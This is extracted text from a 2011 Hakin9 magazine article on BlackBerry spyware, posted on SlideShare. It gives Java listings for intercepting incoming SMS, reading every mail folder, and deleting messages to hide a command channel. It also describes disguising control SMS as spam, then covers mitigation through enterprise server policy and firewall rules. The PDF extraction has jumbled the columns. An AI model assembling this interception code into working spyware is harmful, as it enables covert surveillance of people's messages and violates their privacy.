SlideShare ist ein Scribd-Unternehmen logo

The Backroom Message That’s Stolen Your Deal

Yury Chemerkin
Yury Chemerkin

Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service. http://hakin9.org/mobile-security-hakin9-042011/

TechnologieBusiness
1 von 7
Downloaden Sie, um offline zu lesen
ATTACK The Backroom Message That’s Stolen Your Deal Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service. What you will learn… What you should know… • Each email-message (or sms-message) as part term of busi- • Basic knowledge about BlackBerry security ness correspondence could be intercept • Message can activate spyware I t lets you to intercept SMS or Email messages via the might just be that your partner is planning a surprise Internet, catch cheating wives or cheating husbands, for you and has enlisted their help, so check the stop employee espionage, protect children, etc. number carefully, particularly if it seems familiar to Well, you’ve just read yet another advertising that you. summarized several spyware products for every mobile OS. To be beyond exception that Windows Mobile, Nothing personal... Symbian, iOS (iPhone) are the most popular with Everyone knows that reading other people’s letters consumer. All of kind has never had a distinct security or diaries, without the permission of the author isn’t policy. But the BlackBerry devices are one of world’s ethical. All personal correspondence, or even just top devices! It’s entirely explicable, though. There’s information such as SMS messages, address book, unique thing is defensible. It has a proof-of-security email, ICQ history, indeed are called for fashionable flow channel to transmit data from each to other. And word Privacy, or a Private, Data Privacy. Any attempt to up to now, there’s no successful decoder for ciphered cheat with it behind author back is a direct violation of technology. the individual privacy. These days a lot of people are in use of a mobile One day, everyone has thought about what men phone, it has made our lives easier and increased write to each other, or what was written by his friend or communication, in spite of opportunity for a cheating. colleagues. It’s no necessarily malicious intent. Do they You suppose your lover isn’t being faithful to you and have something to hide, to hatch a plot? Omnivorous you ought to grant your suspicions or allay your fears. curiosity is one of the most popular human vice helps So, the main of evidence can be new lover is linked with to fraudster to earn considerable sums of money every your partner. day. They always ready to help to get into somebody Telltale signs will be sms to the same number, late address phone book, email message or social at night or early in the morning or both, if the same networking pages for all comers. After all do you can number is appearing as a call at unsocial hours get access to cherished friend’s (lover’s, boss, foes) then you really have something to be concerned chats? about. However there can be a perfectly innocent The victim’s mobile phone is coveted human’s goal. explanation for activity like this and its worth pausing This storage place may shed light on wrapped in before jumping to conclusions. If the number that is mystery things. There’s no way to read others emails appearing is that of a family member or good friend it or sms. You can take phone and read all you interested 22 04/2011
The backroom message that’s stolen your deal in. It’s one of the easiest ways to do. By the way, you Routines behind the screen... may to provoke your victim into allowing acquainting The message (sms or email) intercept is a great yourself with privacy data. It should be noted that lack opportunity to take control of somebody and be invisible. of knowledge is leading topics of the hour. Now the You’re able to read emails as well as make a telephone plot thickens in call for a vote of confidence! Really, directory (subscriber’s list) through the text messages to how long does software ask you to grant with privacy a minute. Such kind of message intercept is in demand data? Do you trust software with yourself secrets? on the situation. Moreover, it’s a real ability to feel a spy Take some kind of program modifying sms&email likewise to obtain information that can’t be get in a legal graphical controls, for instance. When you’re going to way. Some years ago such intercepts were a science install it you’ve been asking to set access permission fiction available for intelligence service. Up to now, you (as general permission), send&receive permission, don’t be secret serviceman; you don’t have a high level etc. of experience. The explanation was quite simple. You There is no reason for concern in this case, right? only need to hit him with your legacy hammer. There’s You install what you like despite expectancy of data no way of misapplication of hummer, isn’t it? You can stealing. If we take a Facebook application (or twitter hammer a nail into board, or you also can hammer application) then confidence level should be reduced a nail into smb head. There is nothing reprehensible because such kind of apps has http/https via EDGE/ about it. The public tranquillity as protectability is wrong 3G/WiFi as common channel to data transmission. side of vulnerability. And vice versa. Further to there’s ability to receive actual information about new friends or upload status by sms sending. Malware Design For some time past, internet spreads a spam with Ultimate goal is show what API-routines help us to design a proposal to use the service to read others’ posts. such malware. List of API classes is shall be import to re- Kaspersky Lab reported about one of these viruses create sms listener is presented in Listing 1. in February, 2009. Users are promised the ability to The first public class Date represents a specific read others SMS. By clicking on the junk link users instant in time, with millisecond precision. downloaded a Trojan called Trojan.Win32.Agent2.dbq (Kaspersky Lab’s Notation). Listing 1. API-routines to design malware's part “sms The next secret (cherished) zone area is a personal intercept” email storage. Email correspondence goes mad not less than others sms. Deceivers are offering java.util.Date; password email account’s breaking services. At javax.wireless.messaging.MessageConnection; first, they also ask for upfront payment via SMS and javax.wireless.messaging.Message; never break into account. There’s another kind of deception. Someone imparts news about security Listing 2. Retrieve the message holes of Google email system or Yahoo email system and offers to get the password from any mailbox. MessageConnection sms_connection = (MessageConnectio There is a need for you to send to the referred above n)Connector.open("sms://:0"); ; email address your (!) password and answer for Message sms_message = sms_connection.receive(); secret question (what’s your favourite colour?). It Date sms_date = sms_message.getTimestamp(); accounts for by cheating the email system (Google, String sms_address = sms_message.getAddress(); Yahoo). After all, you’ll supposedly receive a list of String sms_body = null; password to any email system. Come again! It’s easy if (m instanceof TextMessage) substitution of your account’s password for desired { password. So, there’s no fraud! Really, there are a lot TextMessage temp_text = (TextMessage)sms_message; of security holes (but it’s just a one kind of it); really, sms_body = temp_text.getPayloadText(); there’s a way to steal password. Are ready to name } this hole? Nobody but you! The email address in else if (m instance of BinaryMessage) received message is just an intruder email account. { This way he gets other’s password. Also he doesn’t byte[] temp_byte = ((BinaryMessage) sms_message). want anyone to confide in. getPayloadData(); Thus, all proposals for access to others’ // convert Binary Data to Text correspondence have two goals. Trick the user out of sms_body = new String(temp_byte, "UTF-8"); money or infect user’s computer with a virus. In this } case, the attacker could also capture the user’s own password. www.hakin9.org/en 23
ATTACK Interface Message is the base interface for derived The MessageConnection interface defines the basic interfaces that represent various types of messages. functionality for sending and receiving messages. It This interface contains the functionality common to all contains methods for sending and receiving messages. messages. We have a couple routines here. The receive() subroutine which receives a message. If there are no messages for this MessageConnection • getAddress() – Returns the address associated with waiting, this method will block until either a message this message. If this is a message to be sent, then for this Connection is received or the MessageConnection this address is the recipient’s address. If this is a is closed. message that has been received, then this address When an incoming message arrives, the notifyIncom is the sender’s address. ingMessage(MessageConnection) method is called. There’s • getTimestamp() – Returns the timestamp indicating a the same method for outcoming message notifyOut when this message has been sent. comingMessage(MessageConnection) that is called when an SMS message is sent from the device. Both of methods Listing 3. API-routines to design malware's part “email are called once for each incoming message to the intercept” MessageConnection. The second malware part is designed to catch email import net.rim.blackberry.api.mail.Address; messages. In this case, It should be used another import net.rim.blackberry.api.mail.Folder; signed routine set which is described in Listing 3. import net.rim.blackberry.api.mail.Message; import net.rim.blackberry.api.mail.Session; Folder INTEGER Constants import net.rim.blackberry.api.mail.Store; • DELETED – A Folder containing deleted messages. • DRAFT – A Folder containing draft messages. Listing 4. Retrieve a email message” • FILED – Contains items that are �led in a Folder. • INBOX – A Folder containing received messages. Session current_session = Session.getDefaultInstan • INVALID – A Folder containing items marked as invalid. • JUNK – A Folder for junk mail. ce(); • OTHER – A Folder that the user created – a personal String folders_name = null; folder. String email_from = null; • OUTBOX – A Folder containing messages in the process of String email_subject = null; being sent. String email_body = null; • SENT – A Folder containing sent messages. • UNFILED – Contains items that are not currently �led in a if (current_session != null) Folder. { Store current_storage = current_ session.getStore(); The Session class provides access to email services, Folder[] flist = current_storage.list(); storage, and transport. for (int i = 0; i < flist.length; i++) The Message class represents an email message. { A message contains a set of header fields (attributes) folders_name = folder.getFullName(); and a body (contents). Messages in a folder also have //get folder's name a set of flags that describe its state within the folder. Message[] msgs = flist[i].getMessages(); Received messages are retrieved from a folder named for (int n=0; n < msgs.length; n++) INBOX (see Folder integer constants). { The Folder class represents a mailbox folder on Address from = msgs[n].getFrom(); the handheld. To retrieve a list of contained folders if (from != null) only call Folder.list(). But we don’t need anything about folder’s contants or system folder’s names, If email_from = from.getAddr(); we need to extract folder’s name it should routine’s } called by getFullName(). By the way, it’s simple to use a email_subject = msgs[n].getSubject(); cycle for (int i = 0; i < email_folder_list.length; i++) email_body = msgs[n].getBodyText(); because we’ve already got email’s folder list by calling } Folder.list(). } The Message class represents a message store and } its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance to access message storage on this device we need to invoke Session.getStore(). 24 04/2011
The backroom message that’s stolen your deal Refers to code above I notice that I rewrite 4 strings’ objects: folders_name, email_from, email_subject, email_body. To data acquisition you should use the Vector object like „Vector data_acq = new Vector() from java.util.Vector and then create a String object by Utils.makeStringFrom Vector converting data. By the way, you also can use a StringBuilder. Stolen messages from blackberry device Sender :: InternetSMS Body :: http://www.blackberryseeker.com/applications/download/ PDF-To-Go-V20_2.aspx Sender :: InternetSMS Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Black jacking_Owning_the_enterprise.m4v.html Puppet theatre Progress is interesting to watch. It is in every area of human activity, else it vanishes from sight. The Figure 1. Application Management cybercrime is beyond exception, too. It rapidly improves which is used by his own inhabitants. The malware 2.0 The most interesting subclass is Backdoor and Trojan- is a new word in the IT Security vocabulary since 2006. DDoS ”. The second subclass will be attended to article This term describes the new generation of malicious later on. And now we discuss a backdoor’s behavior. software because it well co-ordinated and well- Well, Backdoors are designed to give malicious users functioning system. By the way, it poisons anti-viruses remote control over an infected computer. So, it’s existence. similar to many administration systems designed and Trojans are malicious programs that perform actions distributed by software developers. These types of which are not authorized by the user: they delete, block, malicious programs make it possible to do anything modify or copy data, and they disrupt the performance the intruder wants on the infected handheld: send of computers or computer networks. Unlike viruses and and receive files, launch files or delete them, display worms, the threats that fall into this category are unable messages, delete data, etc. The programs in this to make copies of themselves or self-replicate. Trojans category are often used in order to unite a group of are classified according to the type of action they victim computers and form a botnet or zombie network. perform on an infected computer. This subclass includes This gives malicious users centralized control over an the following behaviors according to Kaspersky Lab: army of infected computers which can then be used for criminal purposes. • Backdoor • Exploit • Rootkit • Trojan-DDoS • Trojan-Downloader • Trojan-Proxy • Trojan-SMS • Trojan-Spy, etc Listing 5. Delete a email message” Import net.rim.blackberry.api.mail.Folder … Message[] emailMessage= emailFolder.getMessages(); for(int i=0;i<emailMessage.length;i++) { emailFolder.deleteMessage(emailMessage[i],true); } Figure 2. Set application’s permission www.hakin9.org/en 25
ATTACK Unfortunately, RIM API does not allow to access already received/sent sms-messages. In spite of it, it still possible to mask our control command to the some kind of spam, e.g. +323232 User MegaFriend has sent message to you. Isn’t it a Facebook notify? It doesn’t matter much that such sms has another sender number; it’s a matter that your device have been received a control message. Mitigation BlackBerry Enterprise Server has several to mitigation. First, you can turn on confirmation of each sending message for cases that blackberry Trojan has ability to spend money and you have to pay the bill. This rule is placed in IT Policy>Common Policy Group>Confirm On Send. If you even set it into True value this rule exerts an impact only on user’s actions. In other words, any kind of program has never notified you when sends Figure 3. Firewall Management message. It also could set a trusted applications in Application Control>Message Access. One more a Most popular message’s control is sms (or mms). radical solution consist in disabling SMS and MMS SMS advantage is rapid access, steadiness, reliability on IT Policy>Device Only Items>Allow SMS and “IT assurance. In BlackBerry’s case email is a second Policy>Common>Disable MMS. The first feature may sufficient channel is capable of the same rapidly moving be set in False state, and the second may be set into events. The way how to catch sms or email messages True value. I discuss above. So, if we’re going to create powerful More powerful way is to create a trusted domain. command control system (further CC) we need know This ability provides us to fill a white list with trusted how to delete this message. Below is part of the codes senders and recipients and to filter a black list as way to delete all the email (see Listing 5). of phrases, senders, recipients. First of all, you The boolean value .deleteMessage(...,true) indicates should check and turn on your BES filter’s status: IT force deletion If the message is marked as saved. Policy>Security>Firewall Block Incoming Messages. If you’ve just caught an email message by using Here it should be checked a SMS, MMS, Enterprise FolderEvent(Folder folder, int type, Message message) Message as filtered types. Enterprise Message is with synchronized void messagesAdded(FolderEvent event) { none of than a enterprise email messages. After it, Message msg = e.getMessage(); } then you can delete it by fill a whitelist in IT Policy>Security>Firewall White List msg.deleteMessage(...). Address with e.g. *@blackberry.enterprise.com. Take Figure 4. Exception’s of black list Figure 5. Adding new exception 26 04/2011
The backroom message that’s stolen your deal On the ‘Net • http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-832026- 1023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version: 5.0. Policy Reference Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview-- 789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application. Version: 5.0. Feature and Technical Overview, RIM • http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application. Version: 5.0. Fundamentals Guide , RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM, • http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library – 4.2.0 Release (Javadoc), RIM, • http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--1001926- 0406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator. Version: 5.0. Development Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_ Administrator_Guide.pdf – BlackBerry Signature Tool 1.0. Developer Guide, RIM notice of using a substitution characters like asterisk of spyware extend well beyond simple monitoring. It’s “*”. You also can add another values separated with designed to spy what you’re doing on your device. comma. First step is done, you’ve just create a trusted They collect information about Web pages you usually domain filled with only white addresses. visit, your Internet surfing habits and messages you The second step is filling black tags. First of all, you exchange. It also interfere with user control of the should turn option, too. The rule IT Policy>Filter Rule> computer in other ways, such as installing additional Condition and Action>Enabled is set into True state software and redirecting Web browser activity or theft switches to strain your emails. The second rule IT of personal information (including financial information Policy>Filter Rule>Condition and Action>From gives such as credit card numbers). opportunity to vanish message from unknown senders. Then it sends without your knowledge to others. Here you can type something like stealer@gmail.com, However, to install they have to hide themselves in hacker@yahoo.com. The same rule IT Policy>Filter demo games as example. The presence of spyware Rule>Condition and Action>Sent To can filter is typically hidden from the user, and can be difficult vulnerable message that can include stolen data to to detect. It’s not very common, it’s not an amount of intruder account or non-trusted account. To control viruses, Trojans, backdoors that antiviruses can stop, transfer subjects and bodies set unallowable phrases and otherwise everybody will know it. Like many recent to following rules: IT Policy>Filter Rule>Condition and viruses, however, spyware by design spyware exploits Action>Subject, IT Policy>Filter Rule>Condition and infected computers for commercial gain. Action>Body. After it, you have to check a last rule Even you think your information isn’t important to that indicate way of delivering black messages. In first intruder, they can use your device resources again case, device is receiving only headers, in second case others or steal data won’t never let you know about it. BES holding such messages don’t allow to device By the way, they foul the trail and left your device (and download it. you) holding the baby. If you are BIS consumer you always check permissions when downloading an application to grant or disallow status to email or sms. Or you can set it after you downloaded application in Options>Device>Applic YURY CHEMERKIN ation Management>Edit Permissions. To fill a white list Graduated at Russian State University for the Humanities with enabling a device firewall you should to follow Op (http://rggu.com/) in 2010. At present postgraduate at RSUH. tions>Security>Firewall, check desirable features and Information Security Analyst since 2009 and currently works add white rule. as mobile info security researcher in Moscow. E-mail: yury.chemerkin@gmail.com. Conclusion Facebook: http://www.facebook.com/people/Yury-Chemerkin/ Spyware is one of the most common types of malware. 100001827345335. While the term spyware suggests software that LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/ secretly monitors the user’s computing, the functions 549 www.hakin9.org/en 27

Empfohlen

Does your black berry smartphone have ears
Does your black berry smartphone have earsDoes your black berry smartphone have ears
Does your black berry smartphone have earsYury Chemerkin
 
Social network privacy guide
Social network privacy guideSocial network privacy guide
Social network privacy guideYury Chemerkin
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiYury Chemerkin
 
Interview with Yury Chemerkin
Interview with Yury ChemerkinInterview with Yury Chemerkin
Interview with Yury ChemerkinYury Chemerkin
 
Social network privacy.
Social network privacy.Social network privacy.
Social network privacy.Yury Chemerkin
 
Is Data Secure On The Password Protected Blackberry Device
Is Data Secure On The Password Protected Blackberry DeviceIs Data Secure On The Password Protected Blackberry Device
Is Data Secure On The Password Protected Blackberry DeviceYury Chemerkin
 
Why is password protection a fallacy a point of view
Why is password protection a fallacy a point of viewWhy is password protection a fallacy a point of view
Why is password protection a fallacy a point of viewYury Chemerkin
 
Social Network Privacy II
Social Network Privacy IISocial Network Privacy II
Social Network Privacy IIYury Chemerkin
 

Empfohlen

Does your black berry smartphone have ears
Does your black berry smartphone have earsDoes your black berry smartphone have ears
Does your black berry smartphone have earsYury Chemerkin
 
Social network privacy guide
Social network privacy guideSocial network privacy guide
Social network privacy guideYury Chemerkin
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiYury Chemerkin
 
Interview with Yury Chemerkin
Interview with Yury ChemerkinInterview with Yury Chemerkin
Interview with Yury ChemerkinYury Chemerkin
 
Social network privacy.
Social network privacy.Social network privacy.
Social network privacy.Yury Chemerkin
 
Is Data Secure On The Password Protected Blackberry Device
Is Data Secure On The Password Protected Blackberry DeviceIs Data Secure On The Password Protected Blackberry Device
Is Data Secure On The Password Protected Blackberry DeviceYury Chemerkin
 
Why is password protection a fallacy a point of view
Why is password protection a fallacy a point of viewWhy is password protection a fallacy a point of view
Why is password protection a fallacy a point of viewYury Chemerkin
 
Social Network Privacy II
Social Network Privacy IISocial Network Privacy II
Social Network Privacy IIYury Chemerkin
 
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
 
Red october. detailed malware description
Red october. detailed malware descriptionRed october. detailed malware description
Red october. detailed malware descriptionYury Chemerkin
 
Comment crew indicators of compromise
Comment crew indicators of compromiseComment crew indicators of compromise
Comment crew indicators of compromiseYury Chemerkin
 
Appendix g iocs readme
Appendix g iocs readmeAppendix g iocs readme
Appendix g iocs readmeYury Chemerkin
 
Appendix f (digital) ssl certificates
Appendix f (digital) ssl certificatesAppendix f (digital) ssl certificates
Appendix f (digital) ssl certificatesYury Chemerkin
 
Appendix e (digital) md5s
Appendix e (digital) md5sAppendix e (digital) md5s
Appendix e (digital) md5sYury Chemerkin
 
Appendix d (digital) fqd ns
Appendix d (digital) fqd nsAppendix d (digital) fqd ns
Appendix d (digital) fqd nsYury Chemerkin
 
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f6016071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f601Yury Chemerkin
 
Jp3 13
Jp3 13Jp3 13
Jp3 13Yury Chemerkin
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
 
The stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityThe stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
 
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realitiesStuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realitiesYury Chemerkin
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Sophos ransom ware fake antivirus
Sophos ransom ware fake antivirusSophos ransom ware fake antivirus
Sophos ransom ware fake antivirusYury Chemerkin
 
Six months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesSix months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesYury Chemerkin
 
Security in the cloud planning guide
Security in the cloud planning guideSecurity in the cloud planning guide
Security in the cloud planning guideYury Chemerkin
 
Security configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesSecurity configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesYury Chemerkin
 
Render man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisRender man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisYury Chemerkin
 
Msft oracle brief
Msft oracle briefMsft oracle brief
Msft oracle briefYury Chemerkin
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Weitere ähnliche Inhalte

Mehr von Yury Chemerkin

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
 
Red october. detailed malware description
Red october. detailed malware descriptionRed october. detailed malware description
Red october. detailed malware descriptionYury Chemerkin
 
Comment crew indicators of compromise
Comment crew indicators of compromiseComment crew indicators of compromise
Comment crew indicators of compromiseYury Chemerkin
 
Appendix g iocs readme
Appendix g iocs readmeAppendix g iocs readme
Appendix g iocs readmeYury Chemerkin
 
Appendix f (digital) ssl certificates
Appendix f (digital) ssl certificatesAppendix f (digital) ssl certificates
Appendix f (digital) ssl certificatesYury Chemerkin
 
Appendix e (digital) md5s
Appendix e (digital) md5sAppendix e (digital) md5s
Appendix e (digital) md5sYury Chemerkin
 
Appendix d (digital) fqd ns
Appendix d (digital) fqd nsAppendix d (digital) fqd ns
Appendix d (digital) fqd nsYury Chemerkin
 
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f6016071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f601Yury Chemerkin
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
 
The stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityThe stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
 
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realitiesStuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realitiesYury Chemerkin
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Sophos ransom ware fake antivirus
Sophos ransom ware fake antivirusSophos ransom ware fake antivirus
Sophos ransom ware fake antivirusYury Chemerkin
 
Six months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesSix months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesYury Chemerkin
 
Security in the cloud planning guide
Security in the cloud planning guideSecurity in the cloud planning guide
Security in the cloud planning guideYury Chemerkin
 
Security configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesSecurity configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesYury Chemerkin
 
Render man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisRender man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisYury Chemerkin
 

Mehr von Yury Chemerkin (20)

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
 
Red october. detailed malware description
Red october. detailed malware descriptionRed october. detailed malware description
Red october. detailed malware description
 
Comment crew indicators of compromise
Comment crew indicators of compromiseComment crew indicators of compromise
Comment crew indicators of compromise
 
Appendix g iocs readme
Appendix g iocs readmeAppendix g iocs readme
Appendix g iocs readme
 
Appendix f (digital) ssl certificates
Appendix f (digital) ssl certificatesAppendix f (digital) ssl certificates
Appendix f (digital) ssl certificates
 
Appendix e (digital) md5s
Appendix e (digital) md5sAppendix e (digital) md5s
Appendix e (digital) md5s
 
Appendix d (digital) fqd ns
Appendix d (digital) fqd nsAppendix d (digital) fqd ns
Appendix d (digital) fqd ns
 
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f6016071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
 
Jp3 13
Jp3 13Jp3 13
Jp3 13
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...
 
The stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityThe stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capability
 
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realitiesStuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Sophos ransom ware fake antivirus
Sophos ransom ware fake antivirusSophos ransom ware fake antivirus
Sophos ransom ware fake antivirus
 
Six months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesSix months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sites
 
Security in the cloud planning guide
Security in the cloud planning guideSecurity in the cloud planning guide
Security in the cloud planning guide
 
Security configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesSecurity configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devices
 
Render man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisRender man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of this
 
Msft oracle brief
Msft oracle briefMsft oracle brief
Msft oracle brief
 

Kürzlich hochgeladen

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
